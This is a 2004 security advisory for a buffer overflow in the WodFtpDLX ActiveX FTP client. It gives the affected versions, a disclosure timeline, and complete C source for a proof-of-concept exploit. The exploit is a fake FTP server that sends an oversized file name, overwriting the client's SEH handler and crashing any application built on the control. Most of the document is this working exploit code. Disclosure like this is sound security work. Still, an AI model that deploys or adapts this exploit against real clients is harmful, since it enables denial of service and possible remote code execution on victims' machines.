wodftpcrash.txt

`AUTHOR  
Komrade  
[email protected]  
http://unsecure.altervista.org  
  
DATE  
22/11/2004  
  
PRODUCT  
WodFtpDLX is an ActiveX component that supports encrypted and  
non-encrypted FTP access to the servers for transferring files.  
It can be used in various programs, scripts, web applications to connect  
to FTP servers.  
The ActiveX is named "WodFtpDLX.ocx" and could be found on the default  
"windows\system32" directory (if installed by any application).  
  
AFFECTED VERSION  
All verion prior to 2.3.2.97 (version fixed by the vendor)  
  
Versions verified to be vulnerable:  
2.2.0.1  
2.3.0.0  
2.3.2.90  
2.3.2.94  
  
DETAILS  
I discovered that this ActiveX doesn't correctly handle a very long file  
name sent from an FTP server.  
This vulnerability occurs when the ActiveX copies the name of the files  
stored in an FTP server in the stack, using a strncpy() function that  
not correctly sets the maximum length of the string.  
It is possible to overwrite a SEH address and cause an exception to the  
program, being able to execute arbitrary commands remotely to a target  
machine.  
  
POC EXPLOIT  
You can find a proof of concept exploit that crashes all the programs  
based on the vulnerable ActiveX.  
http://unsecure.altervista.org/security/wodftpcrash.c  
  
VENDOR STATUS  
I notified this vulnerability to the vendor on 18/11/2004 and they  
create a new fixed version of the ActiveX.  
See http://weonlydo.com to download the new fixed verion.  
  
VULNERABILITY TIMELINE  
16/11/2004 Vulnerbility found.  
18/11/2004 Vendor contacted for the first time.  
18/11/2004 Vendor reply.  
19/11/2004 Vulnerability fixed. A new version is now avaible.  
22/11/2004 Public disclosure.  
  
  
--   
- Unsecure Programs -  
- http://unsecure.altervista.org -  
  
- Vulnerabilities and exploits -  
- http://unsecure.altervista.org/security.htm -  
  
  
  
  
  
/************************************************************************************  
  
WodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit  
created by Komrade  
e-mail: unsecure(at)altervista(dot)org  
web: http://unsecure.altervista.org  
  
Tested on WodFtpDLX.ocx versions 2.3.2.90 - 2.3.0.0 - 2.2.0.1  
on a Windows XP Professional sp2 operating system.  
  
This exploit creates a fake FTP server on your machine, waiting for the  
connection of an application that uses the WodFtpDLX.ocx ActiveX Control.  
After the exploit is sent the application will crash, trying to access  
to a bad memory address: 0xDEADCODE.  
This exploit can be executed locally or remotely.  
  
Usage: wodftpcrash [-l] [-r server IP]  
  
Options:  
-l executed locally  
-r serverIP executed remotely. You need to specify the address  
of the FTP server for the PASV command (Insert your IP address)  
  
Examples:  
  
C:\> wodftpcrash -l <- executed locally  
C:\> wodftpCrash -r 10.0.0.1 <- executed remotely  
  
***************************************************************************************/  
  
#include <stdio.h>  
#include <string.h>  
#include <windows.h>  
#include <winsock.h>  
  
#define FTP_PORT 21  
#define PASV_PORT 1106  
  
int wait = TRUE;  
  
DWORD WINAPI fileList(LPVOID data);  
  
int main(int argc,char **argv){  
  
SOCKET sock, client;  
struct sockaddr_in sock_addr,client_addr;  
WSADATA data;  
WORD p;  
char mess[4096], received[512], addr[32];  
int lun, n, i, err;  
HANDLE fileListH;  
DWORD fileListId, exitCode;  
  
printf("------------------------------------------------------------------------------\r\n");  
printf("WodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit\r\n");  
printf("\t\t\tcreated by Komrade\r\n\r\n");  
  
printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");  
printf("\t\tweb: http://unsecure.altervista.org\r\n");  
printf("------------------------------------------------------------------------------\r\n\r\n");  
  
if (((argc != 2) || (strcmp(argv[1], "-l") != 0)) && ((argc != 3) || (strcmp(argv[1], "-r") != 0))){  
printf("Usage: WodFtpCrash [-l] [-r server IP]\r\n\r\n");  
printf("Options:\r\n");  
printf(" -l\t\texecuted locally.\r\n");  
printf(" -r server IP\texecuted remotely. You need to specify the address of the\r\n");  
printf("\t\tFTP server for the PASV command (Insert your IP address)\r\n");  
printf("\r\nExamples:\r\n");  
printf(" wodftpcrash -l\t\t\texecuted locally\r\n");  
printf(" wodftpCrash -r 10.0.0.1\texecuted remotely\r\n");  
return 0;  
}  
  
if(strcmp(argv[1], "-r") == 0){  
char *token[4];  
  
token[0]=strtok(argv[2], ".");  
for(i = 1; i < 4; i++){  
token[i]=strtok(NULL, ".");  
}  
  
strcpy(addr, "\0");  
  
for(i=0; (i < 4) && (token[i]!= NULL); i++){  
strlcat(addr, token[i], 16);  
strcat(addr, ",");  
}  
}  
else  
strcpy(addr, "127,0,0,1,");  
  
p = MAKEWORD(2, 0);  
WSAStartup(p, &data);  
  
sock=socket(PF_INET,SOCK_STREAM,0);  
sock_addr.sin_family=PF_INET;  
sock_addr.sin_port=htons(FTP_PORT);  
sock_addr.sin_addr.s_addr=INADDR_ANY;  
  
err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));  
if (err < 0){  
printf("Error in bind(). Port may be in use\r\n");  
return -1;  
}  
err = listen(sock,1);  
if (err < 0){  
printf("Error in listen()\r\n");  
return -1;  
}  
  
lun = sizeof (struct sockaddr);  
  
printf("Opening the FTP port and waiting for connections...\r\n");  
client = accept(sock, (struct sockaddr*)&client_addr, &lun);  
printf("Client connected from IP: %s\r\n\r\n", inet_ntoa(client_addr.sin_addr));  
  
strcpy(mess, "220 WodFtpDlx ActiveX Control Crash Exploit\r\n");  
n=send(client, mess, strlen(mess), 0);  
if (n < 0){  
printf("Error in send()\r\n");  
return -1;  
}  
  
while(wait == TRUE){  
  
Sleep(800);  
n = recv(client, received, sizeof(mess), 0);  
if (n < 0){  
printf("Error in recv()\r\n");  
return -1;  
}  
  
received[n]=0;  
printf("CLIENT: %s", received);  
  
if (stricmp("USER", strtok(received, " ")) == 0)  
strcpy(mess, "331 Anonymous access allowed, send password.\r\n");  
else if (stricmp("PASS", strtok(received, " ")) == 0)  
strcpy(mess, "230 Anonymous user logged in.\r\n");  
else if (stricmp("PWD\r\n", received) == 0)  
strcpy(mess, "257 \"/\" is current directory.\r\n");  
else if (stricmp("CWD", strtok(received, " ")) == 0)  
strcpy(mess, "257 \"/\" is current directory.\r\n");  
else if (stricmp("TYPE", strtok(received, " ")) == 0)  
strcpy(mess, "200 Type set to A.\r\n");  
else if (stricmp("PASV\r\n", received) == 0){  
fileListH = CreateThread(NULL, 0, fileList, NULL, 0, &fileListId);  
if (fileListH == NULL)  
printf("Error in CreateThread() %d", GetLastError());  
wsprintf(mess, "227 Entering Passive Mode (%s4,82).\r\n", addr);  
}  
else if (stricmp("LIST", strtok(received, " ")) == 0 || stricmp("LIST\r\n", received) == 0){  
strcpy(mess, "125 Data connection already open; Transfer starting.\r\n");  
printf("SERVER: %s\r\n", mess);  
n=send(client, mess, strlen(mess), 0);  
if (n < 0){  
printf("Error in send()\r\n");  
return -1;  
}  
wait = FALSE;  
  
do{  
GetExitCodeThread(fileListH, &exitCode);  
Sleep(100);  
}  
while(exitCode == STILL_ACTIVE);  
printf("< Long file name sent to client >\r\n\r\n");  
  
strcpy(mess, "226 Transfer complete.\r\n");  
}  
else  
strcpy(mess, "550 Unimplemented\r\n");  
  
printf("SERVER: %s\r\n", mess);  
n = send(client, mess, strlen(mess), 0);  
if (n < 0){  
printf("Error in send()\r\n");  
return -1;  
}  
}  
  
printf("Wait.......");  
Sleep(2000);  
printf("Exploit succesfully sent!\r\n");  
  
closesocket (client);  
closesocket(sock);  
  
WSACleanup();  
return 0;  
}  
  
DWORD WINAPI fileList(LPVOID data){  
  
char SEHAddr[] = "\xDE\xC0\xAD\xDE"; //this will be the new SEH address  
  
SOCKET sock, client, list;  
struct sockaddr_in sock_addr,client_addr;  
  
WSADATA wData;  
WORD p;  
char mess[4096];  
int lun, n, i, err;  
  
p = MAKEWORD(2, 0);  
WSAStartup(p, &wData);  
  
sock=socket(PF_INET,SOCK_STREAM,0);  
sock_addr.sin_family=PF_INET;  
sock_addr.sin_port=htons(PASV_PORT);  
sock_addr.sin_addr.s_addr=INADDR_ANY;  
err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));  
if (err < 0){  
printf("Error in bind(). Port may be in use\r\n");  
return -1;  
}  
err = listen(sock,1);  
if (err < 0){  
printf("Error in listen().\r\n");  
return -1;  
}  
lun = sizeof (struct sockaddr);  
  
client = accept(sock, (struct sockaddr*)&client_addr, &lun);  
  
while (wait == TRUE)  
Sleep(100);  
  
strcpy(mess, "03-04-81 12:00PM 3 ");  
  
for(i=strlen(mess); i<1083; i++)  
mess[i]='a';  
mess[i]='\0';  
  
strcat(mess, SEHAddr);  
  
for(i=strlen(mess); i<1300; i++) // cause the exception  
mess[i]='b';  
mess[i]='\0';  
  
strcat(mess, "\r\n");  
  
n = send(client, mess, strlen(mess), 0);  
if (n < 0){  
printf("Error in send()\r\n");  
return -1;  
}  
  
closesocket(sock);  
closesocket(client);  
WSACleanup();  
  
return 0;  
}  
`